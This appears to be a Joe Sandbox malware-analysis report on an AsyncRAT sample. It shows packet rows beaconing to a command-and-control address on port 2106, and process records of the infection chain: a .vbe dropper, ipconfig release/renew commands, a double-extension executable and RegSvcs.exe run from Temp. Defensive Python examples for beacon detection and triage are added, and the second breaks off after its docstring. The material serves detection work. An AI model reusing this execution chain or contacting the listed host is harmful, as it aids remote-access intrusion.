                                      Dec 31, 2024 20:30:01.074743032 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.079497099 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.079593897 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.084350109 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.603480101 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.608272076 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.609594107 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.614330053 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.803788900 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.936083078 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.936155081 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.937736988 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.942513943 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.942626953 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.947412014 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:05.053662062 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:05.058489084 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:05.059477091 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:05.064249992 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:05.252439976 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:05.318922997 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:05.379966021 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:05.383481979 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:05.388219118 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:05.388403893 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:05.393155098 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:09.927218914 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:10.006730080 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:10.059885979 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:10.115742922 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:13.463382959 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:13.468214989 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:13.468327045 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:13.473088980 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:13.675759077 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:13.727396965 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:13.762376070 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:13.764051914 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:13.768800020 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:13.771495104 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:13.776845932 CET210649737195.26.255.81192.168.2.4
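
The packet rows above leave the report export with the Source Port, Dest Port, Source IP and Dest IP columns run together into a single digit string after the time zone. The Python below is an added example, not part of the Joe Sandbox report: it recovers the columns (the split is genuinely ambiguous, for instance 2106/49737 versus 21064/9737 in the server-to-client rows, so it keeps only readings that involve the analysis host 192.168.2.4 and settles what remains against flows that other rows establish unambiguously) and then measures the spacing of the client-initiated bursts to 195.26.255.81:2106. The sample rows are copied from the table; the 1-second burst-silence threshold and all function names are this example's own choices.

```python
"""Recover the columns of Joe Sandbox "TCP Packets" rows whose fields were run
together, then measure the client's beacon interval to the C2 endpoint."""
import re
from datetime import datetime
from itertools import product
from statistics import median

# Sample input: rows copied verbatim from the packet list above. The port and
# address columns are fused into one digit string after the time zone.
SAMPLE_ROWS = """\
Dec 31, 2024 20:28:35.699629068 CET497372106192.168.2.4195.26.255.81
Dec 31, 2024 20:28:35.704509974 CET210649737195.26.255.81192.168.2.4
Dec 31, 2024 20:28:36.015849113 CET497372106192.168.2.4195.26.255.81
Dec 31, 2024 20:28:38.371747017 CET497372106192.168.2.4195.26.255.81
Dec 31, 2024 20:28:38.376661062 CET210649737195.26.255.81192.168.2.4
Dec 31, 2024 20:28:46.259771109 CET497372106192.168.2.4195.26.255.81
Dec 31, 2024 20:28:46.264605999 CET210649737195.26.255.81192.168.2.4
Dec 31, 2024 20:28:54.147990942 CET497372106192.168.2.4195.26.255.81
Dec 31, 2024 20:29:02.042114019 CET497372106192.168.2.4195.26.255.81
""".splitlines()

HOST_IP = "192.168.2.4"  # the analysis VM's address, as it appears in the rows

ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) "
    r"(?P<tz>[A-Z]{3,4})(?P<tail>[0-9.]+)$")


def _num(s, hi):
    """Digit group as int if it is canonical (no leading zero) and <= hi, else None."""
    if not s or (len(s) > 1 and s[0] == "0") or int(s) > hi:
        return None
    return int(s)


def candidates(tail):
    """Every reading of 'srcport dstport srcip dstip' fused into one string.
    Two dotted quads contribute six dots, so splitting on '.' confines the
    ambiguity to group 0 (port, port, first octet) and group 3 (last octet of
    the source address glued to the first octet of the destination)."""
    g = tail.split(".")
    if len(g) != 7:
        return []
    fixed = [_num(x, 255) for x in (g[1], g[2], g[4], g[5], g[6])]
    if None in fixed:
        return []
    o1, o2, o5, o6, o7 = fixed
    out = []
    for i, j in product(range(1, 6), repeat=2):           # a port is 1..5 digits
        sp = _num(g[0][:i], 65535)
        dp = _num(g[0][i:i + j], 65535)
        a = _num(g[0][i + j:], 255)
        if None in (sp, dp, a):
            continue
        for k in range(1, 4):                              # an octet is 1..3 digits
            d, e = _num(g[3][:k], 255), _num(g[3][k:], 255)
            if None not in (d, e):
                out.append((sp, dp, f"{a}.{o1}.{o2}.{d}", f"{e}.{o5}.{o6}.{o7}"))
    return out


def flow_key(c):
    """Direction-free identity of a flow: the set of its two (ip, port) endpoints."""
    sp, dp, sip, dip = c
    return frozenset({(sip, sp), (dip, dp)})


def parse_rows(rows, host_ip=HOST_IP):
    """Parse rows into (timestamp, src_port, dst_port, src_ip, dst_ip). A reading
    must involve host_ip; leftover ambiguity (2106/49737 vs 21064/9737) is
    settled by the flows that other rows establish unambiguously."""
    parsed = []
    for row in rows:
        m = ROW_RE.match(row.strip())
        if not m:
            raise ValueError(f"unrecognised row: {row!r}")
        # datetime carries microseconds, so the nanosecond tail is truncated.
        ts = datetime.strptime(f"{m['ts']}.{m['frac'][:6]}", "%b %d, %Y %H:%M:%S.%f")
        parsed.append((ts, [c for c in candidates(m["tail"]) if host_ip in c[2:]]))
    known = {flow_key(c[0]) for _, c in parsed if len(c) == 1}
    packets = []
    for ts, cands in parsed:
        if len(cands) > 1:
            cands = [c for c in cands if flow_key(c) in known] or cands
        if len(cands) != 1:
            raise ValueError(f"ambiguous row at {ts}: {cands}")
        packets.append((ts, *cands[0]))
    return packets


def beacon_intervals(packets, host_ip=HOST_IP, quiet_s=1.0):
    """Seconds between the starts of client-initiated bursts; a client packet
    after more than quiet_s seconds of client silence opens a new burst
    (quiet_s is an assumed threshold, not a value from the report)."""
    client = sorted(ts for ts, sp, dp, sip, dip in packets if sip == host_ip)
    if not client:
        return []
    starts = [client[0]] + [t for p, t in zip(client, client[1:])
                            if (t - p).total_seconds() > quiet_s]
    return [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]


def summarise(rows, host_ip=HOST_IP):
    packets = parse_rows(rows, host_ip)
    peers = sorted({(dip, dp) for _, sp, dp, sip, dip in packets if sip == host_ip})
    gaps = beacon_intervals(packets, host_ip)
    return {"peers": peers, "bursts": len(gaps) + 1,
            "median_interval_s": round(median(gaps), 3) if gaps else None}


if __name__ == "__main__":
    print(summarise(SAMPLE_ROWS))
```

Over the nine copied rows the median gap between burst starts comes out near 7.9 s, which matches the roughly eight-second spacing between most of the client-initiated bursts in the full table (the shorter gaps are server-initiated exchanges the client answers). A stable interval like this, on a high, non-standard port, is the value to feed a beacon-detection rule; the caveat is that the server-driven rows would skew the figure if they were not filtered out first.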

                                      Target ID:0
                                      Start time:14:26:06
                                      Start date:31/12/2024
                                      Path:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\yjOJ1YK5M3.exe"
                                      Imagebase:0x270000
                                      File size:1'020'449 bytes
                                      MD5 hash:7B17EBBF77F53472D2FEBB38E9785026
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:14:26:10
                                      Start date:31/12/2024
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe"
                                      Imagebase:0x4d0000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:14:26:20
                                      Start date:31/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:14:26:20
                                      Start date:31/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:14:26:20
                                      Start date:31/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c cipkucw.ppt xdgrnj.pdf
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:14:26:20
                                      Start date:31/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:14:26:20
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      Wow64 process (32bit):true
                                      Commandline:cipkucw.ppt xdgrnj.pdf
                                      Imagebase:0x6f0000
                                      File size:947'288 bytes
                                      MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:7
                                      Start time:14:26:20
                                      Start date:31/12/2024
                                      Path:C:\Windows\SysWOW64\ipconfig.exe
                                      Wow64 process (32bit):true
                                      Commandline:ipconfig /release
                                      Imagebase:0x320000
                                      File size:29'184 bytes
                                      MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:8
                                      Start time:14:26:23
                                      Start date:31/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:14:26:23
                                      Start date:31/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:14:26:23
                                      Start date:31/12/2024
                                      Path:C:\Windows\SysWOW64\ipconfig.exe
                                      Wow64 process (32bit):true
                                      Commandline:ipconfig /renew
                                      Imagebase:0x320000
                                      File size:29'184 bytes
                                      MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:12
                                      Start time:14:26:30
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                      Imagebase:0xbd0000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Has exited:false

                                      Target ID:15
                                      Start time:14:26:36
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
                                      Imagebase:0xfc0000
                                      File size:947'288 bytes
                                      MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Has exited:true

                                      Target ID:16
                                      Start time:14:26:42
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                      Imagebase:0x390000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                      Has exited:true

                                      Target ID:17
                                      Start time:14:26:49
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
                                      Imagebase:0xfc0000
                                      File size:947'288 bytes
                                      MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      Has exited:true

                                      Target ID:18
                                      Start time:14:26:56
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                      Imagebase:0xb20000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:14:26:58
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
                                      Imagebase:0xfc0000
                                      File size:947'288 bytes
                                      MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      Has exited:true

                                      Target ID:20
                                      Start time:14:27:04
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                      Imagebase:0x770000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true
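The process records above carry the behaviour a triage analyst keys on without needing the Yara hits: a double-extension binary (cipkucw.ppt.exe) in a user Temp subfolder, given a document-named argument (xdgrnj.pdf); a file named RegSvcs.exe executing from Temp rather than from the .NET framework directory, launched once elevated (Target ID 12) and then repeatedly unelevated (16, 18, 20); and an ipconfig /release followed by cmd /c ipconfig /renew. The script below is an added example, not part of the Joe Sandbox report: it parses records in the report's own key:value layout and flags those patterns. The sample input is a subset of the records above copied verbatim; the check names, the extension lists, the set of .NET utilities and the assumption that their legitimate copies live under C:\Windows are the example's own choices, not Joe Sandbox or Sigma rule definitions.

```python
"""Triage helper for Joe Sandbox style process records (added example)."""
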